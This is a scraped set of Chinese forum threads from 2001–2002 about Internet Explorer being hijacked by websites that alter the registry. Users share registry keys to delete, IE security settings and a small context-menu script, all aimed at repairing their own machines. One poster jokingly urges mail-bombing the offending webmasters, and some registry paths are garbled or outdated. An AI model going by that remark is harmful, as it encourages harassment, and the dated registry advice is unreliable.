如果我注定是那只小鸟，那我会在死亡之前飞久、飞远一些......
ocean

终级用户
积分：485
发帖：280
来自：
注册：2000-06-17
 发表于 2001-07-18 18:19:08 按此观看ocean的个人资料 按此发邮件给ocean ocean 的 oicq 是5423204,查看 5423204 的资料 发送悄悄话给ocean 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ocean的IP
我在注册表里没找到他的自启动应用程序~
你是怎么解决的？

..::一蓑烟雨任平生::..
张无忌

win1st
管理员
积分：7148
发帖：3108
来自：Blueidea.com
注册：2000-09-10
 发表于 2001-07-18 18:20:30 按此观看张无忌的个人资料 按此发邮件给张无忌 访问张无忌的主页 发送悄悄话给张无忌 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看张无忌的IP
ocean在上个贴子中说
引用:
我在注册表里没找到他的自启动应用程序~
你是怎么解决的？

那说明你还没遇难！

只用一样东西，不明白它的道理，实在不高明

Blueidea Web Team
Team Member

张无忌

win1st
管理员
积分：7148
发帖：3108
来自：Blueidea.com
注册：2000-09-10
 发表于 2001-07-18 18:21:31 按此观看张无忌的个人资料 按此发邮件给张无忌 访问张无忌的主页 发送悄悄话给张无忌 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看张无忌的IP
我搜了注册表，找到两处，都del了。

只用一样东西，不明白它的道理，实在不高明

Blueidea Web Team
Team Member

ocean

终级用户
积分：485
发帖：280
来自：
注册：2000-06-17
 发表于 2001-07-18 18:29:58 按此观看ocean的个人资料 按此发邮件给ocean ocean 的 oicq 是5423204,查看 5423204 的资料 发送悄悄话给ocean 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ocean的IP
倒~应该有。
一开机就会警告“Internet Explorer当前的activex不安全”，点否，这个窗口就一直出现，同时后台运行巨多的wscript，机器几乎不能动。
点是，就会要求你拨号到一个站点~~~~~~~

..::一蓑烟雨任平生::..
FixBox

初级用户
积分：148
发帖：82
来自：
注册：2001-07-11
 发表于 2001-07-18 19:07:24 按此观看FixBox的个人资料 按此发邮件给FixBox 访问FixBox的主页 发送悄悄话给FixBox 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看FixBox的IP
深表同情！建议运行windows/system 目录下的Msconfig.exe查一下！
xxz

超级用户
积分：366
发帖：373
来自：电话线里
注册：2001-06-14
 发表于 2001-07-18 19:26:35 按此观看xxz的个人资料 按此发邮件给xxz 访问xxz的主页 xxz 的 oicq 是7300067,查看 7300067 的资料 发送悄悄话给xxz 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看xxz的IP
张无忌在上个贴子中说
引用:
修改主页、收藏，修改浏览器的title。

最近又发现一种，修改了我的windows启动程序，竟然在每次启动机器的时候自动打开ie并联接到某网页！！！

！！！！！！！

IE6没问题吧？

如果你是MM你就叫“星星仔.....!
mvss

高级用户
积分：221
发帖：116
来自：sh.ch
注册：2001-05-29
 发表于 2001-07-18 20:27:43 按此观看mvss的个人资料 按此发邮件给mvss 访问mvss的主页 发送悄悄话给mvss 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看mvss的IP
IE6好像很少发生这种事

http://mvss.yeah.net
happyseven

众生无我
积分：3092
发帖：1948
来自：无
注册：2001-03-08
 发表于 2001-07-18 20:41:30 按此观看happyseven的个人资料 按此发邮件给happyseven happyseven 的 oicq 是5849467,查看 5849467 的资料 发送悄悄话给happyseven 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看happyseven的IP
FixBox在上个贴子中说
引用:
深表同情！建议运行windows/system 目录下的Msconfig.exe查一下！

2000下没有这个东东啊

Blueidea Web Team
Moderator Of Amphitheater Forum

大白若辱，大方无隅，大器晚成，大音希声，大象无形，道隐无名。夫唯道，善贷且成。
amith

终级用户
积分：620
发帖：327
来自：aougu.com
注册：2001-04-20
 发表于 2001-07-18 21:06:46 按此观看amith的个人资料 按此发邮件给amith 访问amith的主页 amith 的 oicq 是1611770,查看 1611770 的资料 发送悄悄话给amith 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看amith的IP
这种网站最恶心。

我现在的 title 变成了 天气预报... http://www.nbtour.com 而我根本都没有去这里。

我都懒的去改了，说不定下次去某个地方他就改成其他的。

lincy

初级用户
积分：27
发帖：22
来自：Xiamen
注册：2000-09-10
 发表于 2001-07-18 21:56:15 按此观看lincy的个人资料 按此发邮件给lincy lincy 的 oicq 是1808352,查看 1808352 的资料 发送悄悄话给lincy 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看lincy的IP
就是，网站首页莫名其妙的被改了。

--<Lincy>--菜鸟一只。
solomon

锋子
积分：1700
发帖：2813
来自：Mahabrahman
注册：2001-04-01
 发表于 2001-07-18 23:07:54 按此观看solomon的个人资料 按此发邮件给solomon 访问solomon的主页 solomon 的 oicq 是2300666,查看 2300666 的资料 发送悄悄话给solomon 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看solomon的IP
反正我见一个炸一个！！

大家一齐动手吧！！嗯...炸站长油箱....吧！网站服务器那...牵扯太多！

年轻人不要着急挣钱，
也不要着急建立什么关系！

重要的是先把自己的基础夯实！

挣钱不是挣一时，
要挣就挣一辈子！！！

Blueidea Web Team.
Team Spalpeen.

MiSuns

终级用户
积分：1311
发帖：1487
来自：上海
注册：2001-07-08
 发表于 2001-07-19 03:48:28 按此观看MiSuns的个人资料 按此发邮件给MiSuns 访问MiSuns的主页 MiSuns 的 oicq 是261236,查看 261236 的资料 发送悄悄话给MiSuns 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看MiSuns的IP
张无忌在上个贴子中说
引用:
最近又发现一种，修改了我的windows启动程序，竟然在每次启动机器的时候自动打开ie并联接到某网页！！！
这算什么，我遇到的更绝！ 每一次断线之后重拨，就会自动打开他的网页！！ 现在我不敢随便去个人网站了 ：（

经典灌字 2002－0 号
兹认定 MiSuns 有使用水利部门任何设备的进行灌溉的权利，任何单位和个人不得以任何理由妨碍和扰乱其灌水。
摄影交流  动物世界  留学在外
我是菜鸟

初级用户
积分：23
发帖：31
来自：
注册：2001-06-26
 发表于 2001-07-19 06:34:12 按此观看我是菜鸟的个人资料 按此发邮件给我是菜鸟 发送悄悄话给我是菜鸟 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看我是菜鸟的IP
巨恶!!!
coolzm

初级用户
积分：0
发帖：16
来自：ZHEJIANG
注册：2001-07-13
 发表于 2001-07-19 07:59:37 按此观看coolzm的个人资料 按此发邮件给coolzm coolzm 的 oicq 是30311521,查看 30311521 的资料 发送悄悄话给coolzm 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看coolzm的IP
amith在上个贴子中说
引用:
这种网站最恶心。

我现在的 title 变成了 天气预报... http://www.nbtour.com 而我根本都没有去这里。

我都懒的去改了，说不定下次去某个地方他就改成其他的。

我与你的情况差不多了，不过是另外一个网站，只不过我在注册表里把那个标题前加了一个fuck，先放着看，爽几天再删。

[这消息被coolzm编辑过(编辑时间2001-07-19 08:00:31)]

我，一个在外漂泊的人，希望能在这里靠岸！
Alien

外星人！
积分：722
发帖：668
来自：地球！
注册：2000-07-26
 发表于 2001-07-19 08:30:37 按此观看Alien的个人资料 按此发邮件给Alien 访问Alien的主页 Alien 的 oicq 是6419759,查看 6419759 的资料 发送悄悄话给Alien 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看Alien的IP
枪毙！！

[ alienhome! | CyberDesigner.org ]
上一贴 | 下一贴
快速回复 | 主题：现在的网站越来越过分！
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


我的标题栏

计算机技术
我的标题栏

上一贴 | 下一贴
发表人 主题: 我的标题栏
civi

初级用户
积分：104
发帖：32
来自：
注册：2001-07-24
 发表于 2001-12-05 08:55:33 按此观看civi的个人资料 按此发邮件给civi 访问civi的主页 收藏该主题供以后查看 发送悄悄话给civi 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看civi的IP
我进了一个该死的网站，他修改了我的浏览器标题栏，怎么弄掉它。谢谢
樱

终级用户
积分：1308
发帖：401
来自：▓★☆★☆★▓
注册：2000-12-11
 发表于 2001-12-05 09:08:54 按此观看樱的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给樱 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看樱的IP
修改注册表中

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Window Title"=""

18J
[w]
yuzhiqing

终级用户
积分：682
发帖：417
来自：中国湖北
注册：2001-04-01
 发表于 2001-12-05 14:20:15 按此观看yuzhiqing的个人资料 按此发邮件给yuzhiqing 访问yuzhiqing的主页 yuzhiqing 的 oicq 是51998,查看 51998 的资料 发送悄悄话给yuzhiqing 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yuzhiqing的IP
如果你的cookie有保存，记得也要清除，不然只要你打开那个叶子（脱机也如此的），他回自动加载的！~

[这消息被yuzhiqing编辑过(编辑时间2001-12-05 14:20:13)]

WINDFLASH
::浅紫色FORUM::
ytmgm2001

初级用户
积分：71
发帖：55
来自：湖南－土匪窝
注册：2001-05-26
 发表于 2001-12-05 17:17:12 按此观看ytmgm2001的个人资料 按此发邮件给ytmgm2001 ytmgm2001 的 oicq 是4650148,查看 4650148 的资料 发送悄悄话给ytmgm2001 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ytmgm2001的IP
这样的问题，基本上哪个介绍计算机方面的网站都有介绍了。为什么还要跑到经典来问这个问题。我发现经典真的不再“经典”了？
什么原因呢？是人多？，是后来的拖先来的腿？或许原因真的很多吧！现在再来找当初刚到经典的感觉？没有了！！

[这消息被ytmgm2001编辑过(编辑时间2001-12-05 17:16:50)]
[这消息被ytmgm2001编辑过(编辑时间2001-12-05 17:17:15)]
[这消息被ytmgm2001编辑过(编辑时间2001-12-05 17:17:17)]

一个想不断超越本性的自我!!努力的为变更着自己的个性而努力!不为别的，只为能好好过活点
arrive

终级用户
积分：1231
发帖：410
来自：大连
注册：2000-12-02
 发表于 2001-12-05 21:38:38 按此观看arrive的个人资料 按此发邮件给arrive 访问arrive的主页 arrive 的 oicq 是7902765,查看 7902765 的资料 发送悄悄话给arrive 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看arrive的IP
IE反修改精灵----软件

[这消息被arrive编辑过(编辑时间2001-12-05 21:37:58)]

Нельзя выпустить из руквозможностъ,которая случается в жизнь.
CIVI

初级用户
积分：104
发帖：32
来自：
注册：2001-07-24
 发表于 2001-12-06 08:31:05 按此观看CIVI的个人资料 按此发邮件给CIVI 访问CIVI的主页 发送悄悄话给CIVI 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看CIVI的IP
ytmgm2001在上个帖子中说
引用:
这样的问题，基本上哪个介绍计算机方面的网站都有介绍了。为什么还要跑到经典来问这个问题。我发现经典真的不再“经典”了？
什么原因呢？是人多？，是后来的拖先来的腿？或许原因真的很多吧！现在再来找当初刚到经典的感觉？没有了！！

这位同志话可不能这样说，不要因为你的技术有所长进就笑话别人，想你当初来时也是不咋地的吧，就因为这里能学到东西，所以大家都来，会你就帮别人一下，你还得指着人家日后帮你呢吧，不会就好好学学，反正大家都是来学习的吗。

上一贴 | 下一贴
快速回复 | 主题：我的标题栏
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


修改注册表恶性代码网页！

计算机技术
修改注册表恶性代码网页！

上一贴 | 下一贴
发表人 主题: 修改注册表恶性代码网页！
ayoung

超级用户
积分：403
发帖：158
来自：北京
注册：2000-11-14
 发表于 2001-12-05 09:19:49 按此观看ayoung的个人资料 该用户不允许显示它的电子邮件 收藏该主题供以后查看 发送悄悄话给ayoung 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ayoung的IP
有些无意中出来的一些成人网站，修改用户的注册表，将title改成它的网址，将鼠标右键上加上它的快捷方式，自动加入收藏夹，自动将其设为IE主页，而且还锁定Internet选项内的主页选择项，不让更改，更甚之的是，甚至将用户计算机更改为一开机即进入IE，进入它的主页面，损失惨重！后来在注册表里删掉了所有相关的网址及title后才恢复正常。而这种潜在的进入这种页面的危机无处不在。
请问，有什么办法能彻底防止注册表被攻击呢，升级IE？可以吗？哪里有IE6.0呢？

^忘忧草^幸运草^
yunbin

经典强盗
现任版主
积分：2292
发帖：1001
来自：火星
注册：2001-09-27
 发表于 2001-12-05 09:29:14 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
http://sh.iduba.net/download/othertools/Duba_RegSolve.exe

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

ayoung

超级用户
积分：403
发帖：158
来自：北京
注册：2000-11-14
 发表于 2001-12-05 10:53:31 按此观看ayoung的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给ayoung 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ayoung的IP
用过这个的，但是，由于它把系统设置成了一起动就进入IE，并且打开该 网页，所以，它的网页上的程序又把清除过的设置又给改过来了，还是直接在注册表里统统删除好。
另外，我是想问，如何预防呢？好像2000里可以设置禁止运行ActiveX什么的，就可以把这些东东禁止掉，可是win98里能设置吗？

^忘忧草^幸运草^
yunbin

经典强盗
现任版主
积分：2292
发帖：1001
来自：火星
注册：2001-09-27
 发表于 2001-12-05 11:52:52 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
ayoung在上个帖子中说
引用:
用过这个的，但是，由于它把系统设置成了一起动就进入IE，并且打开该 网页，所以，它的网页上的程序又把清除过的设置又给改过来了，还是直接在注册表里统统删除好。
另外，我是想问，如何预防呢？好像2000里可以设置禁止运行ActiveX什么的，就可以把这些东东禁止掉，可是win98里能设置吗？

ie --->工具--->选项---->安全--->自定义级别

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

yuzhiqing

终级用户
积分：682
发帖：417
来自：中国湖北
注册：2001-04-01
 发表于 2001-12-05 14:24:28 按此观看yuzhiqing的个人资料 按此发邮件给yuzhiqing 访问yuzhiqing的主页 yuzhiqing 的 oicq 是51998,查看 51998 的资料 发送悄悄话给yuzhiqing 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yuzhiqing的IP
其实这个页面还驻存你的cookie里，你点internet选项，把所有的历史记录也清除，就好了

WINDFLASH
::浅紫色FORUM::
上一贴 | 下一贴
快速回复 | 主题：修改注册表恶性代码网页！
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


请教各位一个问题。

计算机技术
请教各位一个问题。

上一贴 | 下一贴
发表人 主题: 请教各位一个问题。
figure

高级用户
积分：172
发帖：66
来自：吉安，江西，中国
注册：2000-01-30
 发表于 2001-12-05 10:27:08 按此观看figure的个人资料 按此发邮件给figure 访问figure的主页 figure 的 oicq 是86066,查看 86066 的资料 收藏该主题供以后查看 发送悄悄话给figure 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看figure的IP
在IE浏览器的“工具”栏下拉菜单里，有时因浏览了一些网页会自动添加了一个新项目，比如“精彩网址”等，用什么方法删除掉它呢？（用优化大师、超级兔子都不行；用 IE里的“查看”-“自定义”只能删掉横向工具栏里的项目，重新装过IE5.0好象也解决不了，不要教我重新格式化哟，我的硬盘没分区，不容易备份。） 多谢了！

Andy's Home
wHeN wErE sO fAr ApArT
CaN sAmEoNe BrEaK mY tEnDeR hEaRt
l u GiRl i ReAlLy Do
SlEeP sO sWeEt WhEn i ThInK oF u
aLl Of Is LiKe A rOsE
NiGhT iS hErE aNd I mUsT cLoSe
wItH yOu In ThOuGhT tHaT yOu R mIn
yunbin

经典强盗
现任版主
积分：2292
发帖：1001
来自：火星
注册：2001-09-27
 发表于 2001-12-05 11:57:42 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\Extensions\

包含入{FB5F1910-F110-11d2-BB9E-00C04F795683} 此类的几个项 查看相关内容 不要的删除~

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

yuzhiqing

终级用户
积分：682
发帖：417
来自：中国湖北
注册：2001-04-01
 发表于 2001-12-05 13:52:36 按此观看yuzhiqing的个人资料 按此发邮件给yuzhiqing 访问yuzhiqing的主页 yuzhiqing 的 oicq 是51998,查看 51998 的资料 发送悄悄话给yuzhiqing 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yuzhiqing的IP
HKEY_LOCAL_user\Software\Microsoft\InternetExplorer\menuExt
就可以删除你不需要的网页了！~

WINDFLASH
::浅紫色FORUM::
lingduyu

初级用户
积分：125
发帖：34
来自：
注册：2001-04-03
 发表于 2002-01-28 09:57:41 按此观看lingduyu的个人资料 按此发邮件给lingduyu 发送悄悄话给lingduyu 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看lingduyu的IP
yuzhiqing在上个帖子中说
引用:
HKEY_LOCAL_user\Software\Microsoft\InternetExplorer\menuExt
就可以删除你不需要的网页了！~

没有吧！你这个好象不能解决上面那位朋友的问题哦！我也试过，这个只能改右键的网址吧？！

我知道我又老又笨又多嘴....但我还是忍不住要问。
lingduyu

初级用户
积分：125
发帖：34
来自：
注册：2001-04-03
 发表于 2002-01-28 10:04:07 按此观看lingduyu的个人资料 按此发邮件给lingduyu 发送悄悄话给lingduyu 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看lingduyu的IP
yunbin在上个帖子中说
引用:
HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\Extensions\

包含入{FB5F1910-F110-11d2-BB9E-00C04F795683} 此类的几个项 查看相关内容 不要的删除~

这位大哥，那么请问您一下那么我该如何区分这几个项目的相关内容呢？因为我也是深受此害啊！我的IE工具菜单里有什么“当当——音乐厅”，什么“填表专家”什么的！我不知道在哪里改呢？
还有呢！就是我的机子在每次启动的时候IE都会被指向一个叫“www.haody.net”的网址，见鬼，我都没去过啊？！

我知道我又老又笨又多嘴....但我还是忍不住要问。
上一贴 | 下一贴
快速回复 | 主题：请教各位一个问题。
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


要多大空间？

计算机技术
要多大空间？

上一贴 | 下一贴
发表人 主题: 要多大空间？
WILLIAMS

初级用户
积分：56
发帖：15
来自：
注册：2001-11-03
 发表于 2001-11-29 15:05:37 按此观看WILLIAMS的个人资料 按此发邮件给WILLIAMS 收藏该主题供以后查看 发送悄悄话给WILLIAMS 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看WILLIAMS的IP
WINDOWS2000安装需要多大的空间？
yunbin

经典强盗
现任版主
积分：2292
发帖：1001
来自：火星
注册：2001-09-27
 发表于 2001-11-29 15:08:36 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
WILLIAMS在上个帖子中说
引用:
WINDOWS2000安装需要多大的空间？

建议系统盘总供空间留2G以上~

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

WILLIAMS

初级用户
积分：56
发帖：15
来自：
注册：2001-11-03
 发表于 2001-11-29 15:23:22 按此观看WILLIAMS的个人资料 按此发邮件给WILLIAMS 发送悄悄话给WILLIAMS 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看WILLIAMS的IP
对不起！我只是要问一下具体要多少空间啊
len

SlowHorse
积分：1192
发帖：568
来自：hebei
注册：2001-09-29
 发表于 2001-11-29 15:32:01 按此观看len的个人资料 按此发邮件给len len 的 oicq 是3248586,查看 3248586 的资料 发送悄悄话给len 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看len的IP
WILLIAMS在上个帖子中说
引用:
对不起！我只是要问一下具体要多少空间啊

最小650M左右.

Dripping water wears away a stone.
嘿嘿

坏笑
积分：403
发帖：524
来自：
注册：2001-10-06
 发表于 2001-11-29 21:14:40 按此观看嘿嘿的个人资料 按此发邮件给嘿嘿 嘿嘿 的 oicq 是42323447,查看 42323447 的资料 发送悄悄话给嘿嘿 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看嘿嘿的IP
len在上个帖子中说
引用:
最小650M左右.

不会吧，为什么我刚装就1G

缘是天定,份在人为.
williams

初级用户
积分：56
发帖：15
来自：
注册：2001-11-03
 发表于 2001-11-29 21:23:56 按此观看williams的个人资料 按此发邮件给williams 发送悄悄话给williams 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看williams的IP
呵呵！你最好把不要的组件删了！
上一贴 | 下一贴
快速回复 | 主题：要多大空间？
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


一个比较气愤的问题！！

计算机技术
一个比较气愤的问题！！

上一贴 | 下一贴
发表人 主题: 一个比较气愤的问题！！
秋雁

超级用户
积分：408
发帖：125
来自：江苏
注册：2001-10-30
 发表于 2001-12-01 21:36:23 按此观看秋雁的个人资料 按此发邮件给秋雁 访问秋雁的主页 秋雁 的 oicq 是5480510,查看 5480510 的资料 收藏该主题供以后查看 发送悄悄话给秋雁 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看秋雁的IP
我上了[YESIZE.COM] 梦幻娱乐后，在我的右键中加入一个快捷方式!!如何去除！！！

*********************************
*　 买论坛，空间，域名 就找我　 *
* 特别优惠供应，联系QQ 5480510 *
*********************************
张无忌

win1st
管理员
积分：7148
发帖：3108
来自：Blueidea.com
注册：2000-09-10
 发表于 2001-12-01 22:04:29 按此观看张无忌的个人资料 按此发邮件给张无忌 访问张无忌的主页 发送悄悄话给张无忌 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看张无忌的IP
在注册表中搜索 YESIZE.COM

找到后就删，多搜索几次，才干净。

只用一样东西，不明白它的道理，实在不高明

Blueidea Web Team
Team Member

yuzhiqing

终级用户
积分：682
发帖：417
来自：中国湖北
注册：2001-04-01
 发表于 2001-12-01 22:37:24 按此观看yuzhiqing的个人资料 按此发邮件给yuzhiqing 访问yuzhiqing的主页 yuzhiqing 的 oicq 是51998,查看 51998 的资料 发送悄悄话给yuzhiqing 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yuzhiqing的IP
搜索yesize才对，并且他有个*.htm的文件，你可以该成你自己的叶子

代码如下<html>
<script language="JavaScript" defer>
var rng = external.menuArguments.document.selection.createRange();
var str = new String(rng.text);
var op = new String("http://你要的主页"+ str);
open(op,'_blank');
</script>
</html>

WINDFLASH
::浅紫色FORUM::
秋雁

超级用户
积分：408
发帖：125
来自：江苏
注册：2001-10-30
 发表于 2001-12-02 22:09:01 按此观看秋雁的个人资料 按此发邮件给秋雁 访问秋雁的主页 秋雁 的 oicq 是5480510,查看 5480510 的资料 发送悄悄话给秋雁 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看秋雁的IP
谢了！！！

*********************************
*　 买论坛，空间，域名 就找我　 *
* 特别优惠供应，联系QQ 5480510 *
*********************************
上一贴 | 下一贴
快速回复 | 主题：一个比较气愤的问题！！
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


问一个注册表的问题

计算机技术
问一个注册表的问题

上一贴 | 下一贴
发表人 | 主题: 问一个注册表的问题
cancan 孤楼寡人 积分：193 发帖：120 来自：shanghai 注册：2001-04-06 | 发表于 2001-11-25 17:32:52 按此观看cancan的个人资料 按此发邮件给cancan 访问cancan的主页 收藏该主题供以后查看 发送悄悄话给cancan 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看cancan的IP 请问怎样去掉在ie中电右键快捷菜单中出现的一些网站加的文字连接，我试了很久就是去不掉，还有在realplayer中最近打开的文件〔显示在file 下面的〕怎么去掉？我看其他的一些软件的新近打开的文件都可以在注册表中去掉嘛！ 谢谢啦！老是在这里问问题，大家辛苦啦，我学好了以后也会来帮忙的。 我们是这个时代快乐的人质
yunbin 经典强盗 现任版主 积分：2292 发帖：1001 来自：火星 注册：2001-09-27 | 发表于 2001-11-25 20:41:14 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP 开始菜单里面运行 regedit HKEY_CURRENT_USER \Software \Microsoft \Internet Explorer \MenuExt 清除这个下面不要的项 A man can succeed at almost anything for which he has unlimited enthusiasm. Blueidea Web Team Moderator Of Computer Technology Forum
cancan 孤楼寡人 积分：193 发帖：120 来自：shanghai 注册：2001-04-06 | 发表于 2001-11-27 17:49:28 按此观看cancan的个人资料 按此发邮件给cancan 访问cancan的主页 发送悄悄话给cancan 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看cancan的IP 谢谢yubin－经典强盗，每次都是你完美地回答我的问题。真的是十分感谢。我会继续努力，学得更好。 ;) 我们是这个时代快乐的人质
上一贴 | 下一贴
快速回复 | 主题：问一个注册表的问题
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


计算机编程的24条法则(转贴)

计算机技术
计算机编程的24条法则(转贴)

上一贴 | 下一贴
发表人 | 主题: 计算机编程的24条法则(转贴)
